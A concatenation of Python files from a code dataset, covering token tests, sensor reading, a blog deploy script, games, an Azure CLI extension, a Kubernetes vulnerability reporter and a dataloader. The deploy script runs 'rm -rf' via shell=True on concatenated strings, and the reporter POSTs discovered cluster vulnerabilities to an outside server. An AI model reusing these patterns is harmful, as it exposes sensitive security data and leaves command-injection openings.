xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_NO_ATTR), uaa_configs.VALID['uaa'])\n self._request_token_for_client_error(\n sec_context, flask_url + '/500',\n 'JWT token does not include scope \"uaa.user\"')\n\n def test_req_client_for_user_401_error(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n expected_message = \\\n 'Bearer token invalid, requesting client does'\\\n ' not have grant_type=user_token or no scopes were granted.'\n\n self._request_token_for_client_error(\n sec_context, flask_url + '/401', expected_message)\n\n def test_req_client_for_user_500_error(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n self._request_token_for_client_error(\n sec_context, flask_url + '/500', 'HTTP status code: 500')\n\n def test_req_client_for_user(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n service_credentials = {\n 'clientid': 'clientid',\n 'clientsecret': 'clientsecret',\n 'url': flask_url + '/correct'\n }\n token = sec_context.request_token_for_client(service_credentials, None)\n self.assertEqual(token, 'access_token')\n","sub_path":"tests/test_req_token.py","file_name":"test_req_token.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"93510454","text":"# Modules\nimport smbus\nimport time\nimport numpy as np\n\ndef get_sht3x_data():\n\n bus = smbus.SMBus(1)\n\n # SHT3x hex adres\n SHT3x_ADDR\t\t= 0x44\n SHT3x_SS\t\t= 0x2C\n SHT3x_HIGH\t\t= 0x06\n SHT3x_READ\t\t= 0x00\n\n # MS to SL\n bus.write_i2c_block_data(SHT3x_ADDR,SHT3x_SS,[0x06])\n time.sleep(0.2)\n\n # Read out data\n data = bus.read_i2c_block_data(SHT3x_ADDR,SHT3x_READ,6)\n\n # Devide data into counts Temperature\n t_data = data[0] << 8 | data[1]\n\n # Devide data into counts Humidity\n h_data = data[3] << 8 | data[4]\n\n # Convert counts to Temperature/Humidity\n Humidity = 100.0*np.float(h_data)/65535.0\n Temperature = -45.0 + 175.0*np.float(t_data)/65535.0\n\n return Humidity, Temperature\n","sub_path":"slave2018/read_sht3x.py","file_name":"read_sht3x.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"619959125","text":"import subprocess\nimport sys\nimport os\n\nblog_base = ''\n\n\ndef exec(cmd, timeout=5):\n print(cmd)\n ret = subprocess.run(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n # encoding=\"utf-8\",\n timeout=timeout)\n if ret.returncode != 0:\n raise Exception(ret.stderr.decode(\"utf8\"))\n\n\ndef deploy():\n blog_path = \"public\"\n old_blog_path = \"public_old\"\n blog_tool_jar_path = \"tool.jar\"\n repo_path = \"repo\"\n\n build_path = repo_path + \"/build\"\n svg_base = build_path + \"/svg\"\n\n src_path = repo_path + \"/src\"\n article_base = src_path + \"/article\"\n md_base = src_path + \"/md\"\n db_path = src_path + \"/service/db.js\"\n\n # cdToBlogBase\n os.chdir(blog_base)\n # deleteArticles\n exec(\"rm -rf \" + article_base)\n # deleteArticleDb\n exec(\"rm -rf \" + db_path)\n # pullBlogSource\n exec(\"cd \" + repo_path + \" git pull\")\n # parseMarkdown\n exec(\"java -jar \" + blog_tool_jar_path + \" \" + md_base, 180)\n # mvArticlesToRepo\n exec(\"mv article \" + article_base)\n # mvArticleDbToRepo\n exec(\"mv db.js \" + db_path)\n # runBuild\n exec(\"cd \" + repo_path + \" && npm run build\", 120)\n # mvSvgToBuild\n exec(\"mv svg \" + svg_base)\n # rmBlogOld\n exec(\"rm -rf \" + old_blog_path)\n # renameBlogToBlogOld\n exec(\"mv \" + blog_path + \" \" + old_blog_path)\n # renameBuildToBlog\n exec(\"mv \" + build_path + \" \" + blog_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Blog base should be specified\")\n exit(-1)\n blog_base = sys.argv[1]\n deploy()\n\n","sub_path":"deployer/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281156333","text":"import zipfile, urllib, csv, os, codecs\n\ndef get_items(url):\n filename, headers = urllib.urlretrieve(url)\n try:\n with zipfile.ZipFile(filename) as zf:\n csvfiles = [name for name in zf.namelist()\n if name.endswith('.csv')]\n for item in csvfiles:\n with zf.open(item) as source:\n reader = csv.DictReader(codecs.getreader('iso-8859-1')(source))\n for line in reader:\n yield line\n finally:\n os.unlink(filename)","sub_path":"dockerized-gists/5295600/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"465008563","text":"while True:\n ''' interface gedeelte'''\n print('Dit zijn de keuzes:'\n '\\n=======================================================================')\n print( 'Optie 1: De computer kiest een patroon en jij gokt'\n '\\nOptie 2: Kies zelf een patroon en de computer gokt, implementatie 1'\n '\\nOptie 3: Kies zelf een patroon en de computer gokt, implementatie 2'\n '\\nOptie 4: Kies zelf een patroon en de computer gokt, eige implementatie'\n '\\n======================================================================='\n '\\nKies 1, 2, 3 of 4')\n\n optie = input(('Maak een keuze:'))\n\n ''' Optie 1'''\n if optie == '1':\n import random\n from src import functies as func\n print('\\n''De kleuren waaruit je kan kiezen zijn: Rood(R), Blauw(B), Groen(GR), Geel(G), Oranje(O) en Paars(P)'\n '\\n')\n kleuren = ['R', 'B', 'Gr', 'G', 'O', 'P']\n PCcode = []\n\n for i in range(4):\n PCcode.append(random.choice(kleuren))\n\n print(PCcode)\n for i in range(1, 11):\n Gokken = []\n while len(Gokken) < 4:\n PlGok = input('Vul jouw gok in met spaties tussen de kleuren:')\n Gokken = PlGok.split(' ')\n\n print(PCcode)\n print('zwart:', func.pinchecker(Gokken, PCcode)[1],\n '\\nwit:', func.pinchecker(Gokken, PCcode)[0])\n\n if func.pinchecker(Gokken, PCcode)[1] == 4:\n print('Je hebt binnen 10 zetten gewonnen!')\n break\n\n print('Helaas, je beurten zijn op. De code was,', PCcode, '\\nNog een keertje proberen?')\n\n\n '''Optie 2'''\n if optie == '2':\n import random\n from src import functies as func\n\n\n\n\n\n\n","sub_path":"Mastermind.py","file_name":"Mastermind.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"534427335","text":"#policy: emergency.py\n# include all the handler for emergency \n# such as data_collect error------- switch to utility (no policy decision can be made)\n\nimport globalValue\nimport sys, copy\nsys.path.append(globalValue.top_path())\nfrom commit import commit_analysis\n\n# switch to utility, when serious errors happen\ndef turn_on_utility():\n open_port = copy.copy(globalValue.ipdu_utility_port())\n close_port = copy.copy(globalValue.ipdu_green_port())\n commit_analysis.ipdu_open_analysis(open_port)\n commit_analysis.ipdu_close_analysis(close_port)\n exit(0)\n","sub_path":"policy/emergency.py","file_name":"emergency.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"272453883","text":"\n\nfrom xai.brain.wordbase.nouns._smudge import _SMUDGE\n\n#calss header\nclass _SMUDGING(_SMUDGE, ):\n\tdef __init__(self,): \n\t\t_SMUDGE.__init__(self)\n\t\tself.name = \"SMUDGING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"smudge\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_smudging.py","file_name":"_smudging.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"117978365","text":"#! /usr/bin/env python3\n#\n# Copyright (c) 2022 Intel Corporation\n#\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nAllocation utilities\n--------------------\n\nInitialize with:\n\n>>> import tcfl.allocation\n>>> tcfl.allocation.subsystem_initialize()\n\n(note it takes care of initializing its dependencies)\n\nThere is no asynchronous method to initialize this module.\n\"\"\"\n\nimport logging\n\nimport tcfl\n\nlogger = logging.getLogger(\"tcfl.allocation\")\n\n_subsystem_setup = False\n\n\ndef _server_allocs_get(_server_name: str, self: tcfl.server_c, username):\n try:\n r = self.send_request(\"GET\", \"allocation/\")\n except (Exception, tcfl.ttb_client.requests.HTTPError) as e:\n self.log.error(\"%s\", e)\n return {}\n\n # So, r is a dictionary { \"ALLOCID\": { ALLOCDATA } }\n #\n # ALLOCDATA is a dictionary { \"FIELD1\": VALUE1 } and among the fields there is:\n #\n # - creator: who created it\n # - user: who is the allocation assigned to\n\n if username:\n # filter here, as we can translate the username 'self' to the\n # user we are logged in as in the server\n filtered_r = {}\n if username == \"self\":\n username = self.logged_in_username()\n\n def _alloc_filter_by_user(allocdata, username):\n if username != None \\\n and username != allocdata.get('creator', None) \\\n and username != allocdata.get('user', None):\n return False\n return True\n\n for allocid, allocdata in r.items():\n if _alloc_filter_by_user(allocdata, username):\n filtered_r[allocid] = allocdata\n else:\n self.log.info(\"alloc-ls: filtered out %s: %s\",\n self.url, allocdata)\n\n return filtered_r\n\n return r\n\n\ndef ls(spec, username: str, parallelization_factor: int = -4,\n traces: bool = True):\n\n import tcfl.servers\n\n return tcfl.servers.run_fn_on_each_server(\n tcfl.server_c.servers, _server_allocs_get, username,\n parallelization_factor = parallelization_factor,\n traces = traces)\n\n\n\ndef subsystem_setup(*args, **kwargs):\n \"\"\"\n Initialize the allocation management system in a synchronous way\n\n Same arguments as :func:`tcfl.servers.subsystem_setup`\n\n Note this will initialize all the modules it requires\n (:mod:`tcfl.config`) if not already initialized.\n \"\"\"\n global _subsystem_setup\n if _subsystem_setup:\n return\n tcfl.servers.subsystem_setup(*args, **kwargs)\n logger.info(\"setting up allocation subsystem\")\n _subsystem_setup = True\n","sub_path":"tcfl/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"596865374","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core import AzCommandsLoader\nfrom knack.help_files import helps\n\nhelps['find'] = \"\"\"\n type: command\n short-summary: I'm an AI robot, my advice is based on our Azure documentation as well as the usage patterns of Azure CLI and Azure ARM users. Using me improves Azure products and documentation.\n examples:\n - name: Give me any Azure CLI command or group and I’ll show the most popular commands and parameters.\n text: |\n az find 'az [group]' : az find 'az storage'\n az find 'az [group] [command]' : az find 'az monitor activity-log list'\n - name: You can also enter a search term, and I'll try to help find the best commands.\n text: |\n az find '[query]' : az find 'arm template'\n\"\"\"\n\n\nclass FindCommandsLoader(AzCommandsLoader):\n\n def __init__(self, cli_ctx=None):\n from azure.cli.core.commands import CliCommandType\n\n process_query_custom = CliCommandType(\n operations_tmpl='azext_find.custom#{}')\n super(FindCommandsLoader, self).__init__(\n cli_ctx=cli_ctx, custom_command_type=process_query_custom)\n\n def load_command_table(self, _):\n with self.command_group('') as g:\n g.custom_command('find', 'process_query')\n return self.command_table\n\n def load_arguments(self, _):\n with self.argument_context('find') as c:\n c.positional('cli_term', help='An Azure CLI command or group for which you need an example.')\n\n\nCOMMAND_LOADER_CLS = FindCommandsLoader\n","sub_path":"src/find/azext_find/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"7567190","text":"file = open('2020/inputs/input-07.txt')\nf = [x.strip()[:-1].split(' bags contain ') for x in file.readlines()]\nbags = {}\n\nfor line in f:\n line[1] = line[1].split(', ')\n if line[1][0] != 'no other bags':\n for i in range(len(line[1])):\n line[1][i] = (int(line[1][i][0]), line[1][i][1:].strip().replace(' bags', '').replace(' bag', ''))\n bags[line[0]] = line[1]\n else:\n bags[line[0]] = [(0, 'none')]\n\n\ndef is_bag1_in_bag2(bag1, bag2):\n ans = 0\n for b in bags[bag2]:\n if b[0] == 0:\n return False\n if b[1] == bag1:\n return True\n if is_bag1_in_bag2(bag1, b[1]):\n return True\n\n\ndef how_many_bags_contain(file, bag):\n ans = 0\n for b in file:\n if is_bag1_in_bag2(bag, b[0]):\n ans += 1\n return ans\n\n\ndef count_bags_inside(file, bag):\n ans = 0\n for b in bags[bag]:\n if b[0] > 0:\n count = count_bags_inside(file, b[1])\n ans += b[0] * count + b[0]\n return ans\n\n\nprint(how_many_bags_contain(f, 'shiny gold'))\nprint(count_bags_inside(f, 'shiny gold'))\n\nfile.close()\n","sub_path":"2020/day-07.py","file_name":"day-07.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"141581695","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef kostka(n):\n return [(np.random.randint(6)+1)+(np.random.randint(6)+1) for x in range(n)]\n\nlista=kostka(50)\nprint(lista)\nplt.hist(lista, bins=10, facecolor=\"red\", alpha=0.75)\nplt.xlabel('Wartości')\nplt.ylabel('Ilość rzutów o danej sumie')\nplt.title('Histogram')\nplt.grid(True)\nplt.show()\n\n","sub_path":"cw10_zad8.py","file_name":"cw10_zad8.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"349763212","text":"import bpy\nfrom rendering.ThemeManager import ThemeManager\nfrom rendering.ThemeConfiguration import configuration as tc\n\ntm = ThemeManager(tc)\n\n# Assets are added together with a parent object\n# with the instance name from the configuration.\n# Position / scale the asset using its parent.\n# Asset will be deleted on reset_scene,\n# but do save the file maintaining the parent.\n# At the next run, the asset will be positioned within the parent again.\ndef load_and_transform(instance_name, model_name, frame, object_prefix=\"Layer\"):\n with bpy.data.libraries.load(\n './models/'+model_name+'.blend', link=False) as (data_src, data_dst):\n data_dst.objects = [name for name in data_src.objects if name.startswith(object_prefix)]\n\n scene = bpy.context.scene\n material_name = tm.get_material_for(model_name, frame)\n mat = bpy.data.materials.get(material_name) if material_name is not None else None\n procedural_instance_name = instance_name+\"_procedural\"\n for obj in data_dst.objects:\n obj.name = procedural_instance_name+\"_\"+obj.name\n if mat is not None: obj.data.materials.append(mat)\n scene.objects.link(obj)\n if instance_name in bpy.context.scene.objects.keys():\n parent = bpy.context.scene.objects[instance_name]\n obj.parent = parent\n else:\n bpy.ops.object.empty_add(type='CUBE',location=(0,0,0))\n parent = bpy.context.scene.objects.active\n parent.name = instance_name\n obj.parent = parent\n parent.select = False\n\n\n\nclass ModelsManager():\n def __init__(self, configuration):\n self.configuration = configuration\n\n def pinocchio(self, frame):\n for key in self.configuration.keys():\n model_config = self.configuration[key]\n frame_config = max(\n filter(\n lambda k: k <= frame,\n map(lambda k: int(k), model_config.keys())\n )\n )\n model_frame_config = model_config[str(frame_config)]\n if model_frame_config is not None:\n load_and_transform(key, model_frame_config, frame)\n","sub_path":"rendering/ModelsManager.py","file_name":"ModelsManager.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"326675298","text":"from __future__ import print_function\nimport json\n\nfrom prettytable import ALL, PrettyTable\nimport __main__\nfrom .collector import services, hunters, vulnerabilities, handler, services_lock, vulnerabilities_lock\nimport requests\nimport logging\nEVIDENCE_PREVIEW = 40\nMAX_TABLE_WIDTH = 20\n\nclass BaseReporter(object):\n def get_nodes(self):\n nodes = list()\n node_locations = set()\n services_lock.acquire()\n for service in services:\n node_location = str(service.host)\n if node_location not in node_locations:\n nodes.append({\"type\": \"Node/Master\", \"location\": str(service.host)})\n node_locations.add(node_location)\n services_lock.release()\n return nodes\n\n def get_services(self):\n services_lock.acquire()\n services_data = [{\"service\": service.get_name(),\n \"location\": \"{}:{}{}\".format(service.host, service.port, service.get_path()),\n \"description\": service.explain()}\n for service in services]\n services_lock.release()\n return services_data\n\n def get_vulnerabilities(self):\n vulnerabilities_lock.acquire()\n vulnerabilities_data = [{\"location\": vuln.location(),\n \"category\": vuln.category.name,\n \"severity\": vuln.get_severity(),\n \"vulnerability\": vuln.get_name(),\n \"description\": vuln.explain(),\n \"version\": str(vuln.evidence)}\n for vuln in vulnerabilities]\n vulnerabilities_lock.release()\n return vulnerabilities_data\n\n def get_hunter_statistics(self):\n hunters_data = list()\n for hunter, docs in hunters.items():\n if not Discovery in hunter.__mro__:\n name, doc = hunter.parse_docs(docs)\n hunters_data.append({\"name\": name, \"description\": doc, \"vulnerabilities\": hunter.publishedVulnerabilities})\n return hunters_data\n\nclass PlainReporter(BaseReporter):\n def get_report(self):\n output = \"\"\n\n vulnerabilities_lock.acquire()\n vulnerabilities_len = len(vulnerabilities)\n vulnerabilities_lock.release()\n\n hunters_len = len(hunters.items())\n\n services_lock.acquire()\n services_len = len(services)\n services_lock.release()\n\n if services_len:\n output += self.nodes_table()\n output += self.services_table()\n if vulnerabilities_len:\n output += self.vulns_table()\n else:\n output += \"\\nNo vulnerabilities were found\"\n else:\n print(\"\\nKube Hunter couldn't find any clusters\")\n return output\n\n def nodes_table(self):\n nodes_table = PrettyTable([\"Type\", \"Location\"], hrules=ALL)\n nodes_table.align = \"l\"\n nodes_table.max_width = MAX_TABLE_WIDTH\n nodes_table.padding_width = 1\n nodes_table.sortby = \"Type\"\n nodes_table.reversesort = True\n nodes_table.header_style = \"upper\"\n id_memory = list()\n services_lock.acquire()\n for service in services:\n if service.event_id not in id_memory:\n nodes_table.add_row([\"Node/Master\", service.host])\n id_memory.append(service.event_id)\n nodes_ret = \"\\n\\nNodes\\n{}\\n\".format(nodes_table)\n services_lock.release()\n return nodes_ret\n\n def services_table(self):\n services_table = PrettyTable([\"Service\", \"Location\"], hrules=ALL)\n services_table.align = \"l\"\n services_table.max_width = MAX_TABLE_WIDTH\n services_table.padding_width = 1\n services_table.sortby = \"Service\"\n services_table.reversesort = True\n services_table.header_style = \"upper\"\n services_lock.acquire()\n for service in services:\n services_table.add_row([service.get_name(), \"{}:{}{}\".format(service.host, service.port, service.get_path())])\n detected_services_ret = \"\\nDetected Services\\n{}\\n\".format(services_table)\n services_lock.release()\n return detected_services_ret\n\n def vulns_table(self):\n column_names = [\"Location\", \"Category\", \"Vulnerability\", \"Description\", \"Evidence\"]\n vuln_table = PrettyTable(column_names, hrules=ALL)\n vuln_table.align = \"l\"\n vuln_table.max_width = MAX_TABLE_WIDTH\n vuln_table.sortby = \"Category\"\n vuln_table.reversesort = True\n vuln_table.padding_width = 1\n vuln_table.header_style = \"upper\"\n\n vulnerabilities_lock.acquire()\n for vuln in vulnerabilities:\n row = [vuln.location(), vuln.category.name, vuln.get_name(), vuln.explain()]\n evidence = str(vuln.evidence) #if len(str(vuln.evidence)) > EVIDENCE_PREVIEW else str(vuln.evidence)\n row.append(evidence)\n vuln_table.add_row(row)\n vulnerabilities_lock.release()\n return \"\\nVulnerabilities\\n{}\\n\".format(vuln_table)\n\n def send_data(self):\n USER_TOKEN = __main__.email.get_email()\n URL = \"http://hotsix.kro.kr/re_result.php\"\n services_lock.acquire()\n for service in services:\n node_data = {'chk':'1','token' : USER_TOKEN, 'Type_1' : 'Node/Master', 'Location_1' : service.host}\n res = requests.post(URL, data=node_data)\n for service in services:\n location_2 = str(service.host) + ':' + str(service.port) + str(service.get_path())\n service_data = {'chk':'2','token' : USER_TOKEN, 'Service_2' : service.get_name(), 'Location_2' : location_2}\n res = requests.post(URL, data=service_data)\n services_lock.release()\n\n vulnerabilities_lock.acquire()\n for vuln in vulnerabilities:\n vuln_data = {'chk':'3','token' : USER_TOKEN, 'Location_3' : vuln.location(), 'Category_3' : str(vuln.category.name), 'Vulnerability_3': vuln.get_name(), 'Description_3' : vuln.explain(), 'Evidence_3' : vuln.evidence}\n res = requests.post(URL, data=vuln_data)\n\n vulnerabilities_lock.release()\n plus=\"=\"*len(USER_TOKEN)\n print(\"\\x1b[1;34m\\n==============================================================================={}\\x1b[1;m\".format(plus))\n print(\"\\x1b[1;34mIf you confirm Kube-Six report, Click This ==> http://hotsix.kro.kr/result.php?{}\\x1b[1;m\".format(USER_TOKEN))\n print(\"\\x1b[1;34m==============================================================================={}\\x1b[1;m\".format(plus))\n","sub_path":"src/modules/report/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"272571868","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, FloatField, IntegerField, BooleanField, SelectField\nfrom wtforms.validators import InputRequired, Length, NumberRange, URL, Optional\n\nclass AddPetForm(FlaskForm):\n \"\"\"Form for adding a pet\"\"\"\n\n pet_name=StringField('Pet Name', validators=[InputRequired()])\n species=SelectField('Species', choices=[(\"cat\", \"Cat\"), (\"dog\", \"Dog\"), (\"porcupine\", \"Porcupine\")])\n photo_url=StringField('Photo URL', validators=[Optional(), URL()])\n age=IntegerField('Age', validators=[Optional(), NumberRange(min=0, max=30)])\n notes=StringField('Notes', validators=[Optional(), Length(min=10)])\n\n\n\n\nclass EditPetForm(FlaskForm):\n \"\"\"Form for editing a pet\"\"\"\n\n photo_url=StringField('Photo URL', validators=[Optional(), URL()])\n notes=StringField('Notes', validators=[Optional(), Length(min=10)])\n available=BooleanField('Available')","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411324893","text":"import argparse\nimport pickle as pk\nimport numpy as np\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_path\", required=True)\n args = parser.parse_args()\n print(args)\n\nloaded = pk.load(open('{}_accs_ROI.pkl'.format(args.input_path), 'rb'))\nmean_subj_acc_across_folds = loaded.mean(0)\nprint(\"Mean Accuracy Across Folds:\")\nfor i in range(len(mean_subj_acc_across_folds)):\n print(\"{}: {}\".format(i, mean_subj_acc_across_folds[i]))","sub_path":"print_mean_accuracy.py","file_name":"print_mean_accuracy.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"599874831","text":"# Dataloader of Gidaris & Komodakis, CVPR 2018\n# Adapted from:\n# https://github.com/gidariss/FewShotWithoutForgetting/blob/master/dataloader.py\nfrom __future__ import print_function\n\nimport os\nimport os.path\nimport numpy as np\nimport random\nimport pickle\nimport json\nimport math\n\nimport torch\nimport torch.utils.data as data\nimport torchvision\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torchnet as tnt\n\nimport h5py\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\n\nfrom pdb import set_trace as breakpoint\n\n\n# Set the appropriate paths of the datasets here.\n_FC100_DATASET_DIR = '/mnt/cube/datasets/few-shot/FC100'\n\ndef buildLabelIndex(labels):\n label2inds = {}\n for idx, label in enumerate(labels):\n if label not in label2inds:\n label2inds[label] = []\n label2inds[label].append(idx)\n\n return label2inds\n\ndef load_data(file):\n try:\n with open(file, 'rb') as fo:\n data = pickle.load(fo)\n return data\n except:\n with open(file, 'rb') as f:\n u = pickle._Unpickler(f)\n u.encoding = 'latin1'\n data = u.load()\n return data\n\nclass FC100(data.Dataset):\n def __init__(self, phase='train', do_not_use_random_transf=False):\n\n assert(phase=='train' or phase=='val' or phase=='test')\n self.phase = phase\n self.name = 'FC100_' + phase\n\n print('Loading FC100 dataset - phase {0}'.format(phase))\n file_train_categories_train_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_train_categories_val_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_train_categories_test_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_val_categories_val_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_val.pickle')\n file_test_categories_test_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_test.pickle')\n\n if self.phase=='train':\n # During training phase we only load the training phase images\n # of the training categories (aka base categories).\n data_train = load_data(file_train_categories_train_phase)\n self.data = data_train['data']\n self.labels = data_train['labels']\n #print (self.labels)\n self.label2ind = buildLabelIndex(self.labels)\n self.labelIds = sorted(self.label2ind.keys())\n self.num_cats = len(self.labelIds)\n self.labelIds_base = self.labelIds\n self.num_cats_base = len(self.labelIds_base)\n #print (self.data.shape)\n elif self.phase=='val' or self.phase=='test':\n if self.phase=='test':\n # load data that will be used for evaluating the recognition\n # accuracy of the base categories.\n data_base = load_data(file_train_categories_test_phase)\n # load data that will be use for evaluating the few-shot recogniton\n # accuracy on the novel categories.\n data_novel = load_data(file_test_categories_test_phase)\n else: # phase=='val'\n # load data that will be used for evaluating the recognition\n # accuracy of the base categories.\n data_base = load_data(file_train_categories_val_phase)\n # load data that will be use for evaluating the few-shot recogniton\n # accuracy on the novel categories.\n data_novel = load_data(file_val_categories_val_phase)\n\n self.data = np.concatenate(\n [data_base['data'], data_novel['data']], axis=0)\n self.labels = data_base['labels'] + data_novel['labels']\n\n self.label2ind = buildLabelIndex(self.labels)\n self.labelIds = sorted(self.label2ind.keys())\n self.num_cats = len(self.labelIds)\n\n self.labelIds_base = buildLabelIndex(data_base['labels']).keys()\n self.labelIds_novel = buildLabelIndex(data_novel['labels']).keys()\n self.num_cats_base = len(self.labelIds_base)\n self.num_cats_novel = len(self.labelIds_novel)\n intersection = set(self.labelIds_base) & set(self.labelIds_novel)\n assert(len(intersection) == 0)\n else:\n raise ValueError('Not valid phase {0}'.format(self.phase))\n\n mean_pix = [x/255.0 for x in [129.37731888, 124.10583864, 112.47758569]]\n\n std_pix = [x/255.0 for x in [68.20947949, 65.43124043, 70.45866994]]\n \n normalize = transforms.Normalize(mean=mean_pix, std=std_pix)\n\n if (self.phase=='test' or self.phase=='val') or (do_not_use_random_transf==True):\n self.transform = transforms.Compose([\n lambda x: np.asarray(x),\n transforms.ToTensor(),\n normalize\n ])\n else:\n self.transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n transforms.RandomHorizontalFlip(),\n lambda x: np.asarray(x),\n transforms.ToTensor(),\n normalize\n ])\n\n def __getitem__(self, index):\n img, label = self.data[index], self.labels[index]\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n img = Image.fromarray(img)\n if self.transform is not None:\n img = self.transform(img)\n return img, label\n\n def __len__(self):\n return len(self.data)\n\n\nclass FewShotDataloader():\n def __init__(self,\n dataset,\n nKnovel=5, # number of novel categories.\n nKbase=-1, # number of base categories.\n nExemplars=1, # number of training examples per novel category.\n nTestNovel=15*5, # number of test examples for all the novel categories.\n nTestBase=15*5, # number of test examples for all the base categories.\n batch_size=1, # number of training episodes per batch.\n num_workers=4,\n epoch_size=2000, # number of batches per epoch.\n ):\n\n self.dataset = dataset\n self.phase = self.dataset.phase\n max_possible_nKnovel = (self.dataset.num_cats_base if self.phase=='train'\n else self.dataset.num_cats_novel)\n assert(nKnovel >= 0 and nKnovel < max_possible_nKnovel)\n self.nKnovel = nKnovel\n\n max_possible_nKbase = self.dataset.num_cats_base\n nKbase = nKbase if nKbase >= 0 else max_possible_nKbase\n if self.phase=='train' and nKbase > 0:\n nKbase -= self.nKnovel\n max_possible_nKbase -= self.nKnovel\n\n assert(nKbase >= 0 and nKbase <= max_possible_nKbase)\n self.nKbase = nKbase\n\n self.nExemplars = nExemplars\n self.nTestNovel = nTestNovel\n self.nTestBase = nTestBase\n self.batch_size = batch_size\n self.epoch_size = epoch_size\n self.num_workers = num_workers\n self.is_eval_mode = (self.phase=='test') or (self.phase=='val')\n\n def sampleImageIdsFrom(self, cat_id, sample_size=1):\n \"\"\"\n Samples `sample_size` number of unique image ids picked from the\n category `cat_id` (i.e., self.dataset.label2ind[cat_id]).\n\n Args:\n cat_id: a scalar with the id of the category from which images will\n be sampled.\n sample_size: number of images that will be sampled.\n\n Returns:\n image_ids: a list of length `sample_size` with unique image ids.\n \"\"\"\n assert(cat_id in self.dataset.label2ind)\n assert(len(self.dataset.label2ind[cat_id]) >= sample_size)\n # Note: random.sample samples elements without replacement.\n return random.sample(self.dataset.label2ind[cat_id], sample_size)\n\n def sampleCategories(self, cat_set, sample_size=1):\n \"\"\"\n Samples `sample_size` number of unique categories picked from the\n `cat_set` set of categories. `cat_set` can be either 'base' or 'novel'.\n\n Args:\n cat_set: string that specifies the set of categories from which\n categories will be sampled.\n sample_size: number of categories that will be sampled.\n\n Returns:\n cat_ids: a list of length `sample_size` with unique category ids.\n \"\"\"\n if cat_set=='base':\n labelIds = self.dataset.labelIds_base\n elif cat_set=='novel':\n labelIds = self.dataset.labelIds_novel\n else:\n raise ValueError('Not recognized category set {}'.format(cat_set))\n\n assert(len(labelIds) >= sample_size)\n # return sample_size unique categories chosen from labelIds set of\n # categories (that can be either self.labelIds_base or self.labelIds_novel)\n # Note: random.sample samples elements without replacement.\n return random.sample(labelIds, sample_size)\n\n def sample_base_and_novel_categories(self, nKbase, nKnovel):\n \"\"\"\n Samples `nKbase` number of base categories and `nKnovel` number of novel\n categories.\n\n Args:\n nKbase: number of base categories\n nKnovel: number of novel categories\n\n Returns:\n Kbase: a list of length 'nKbase' with the ids 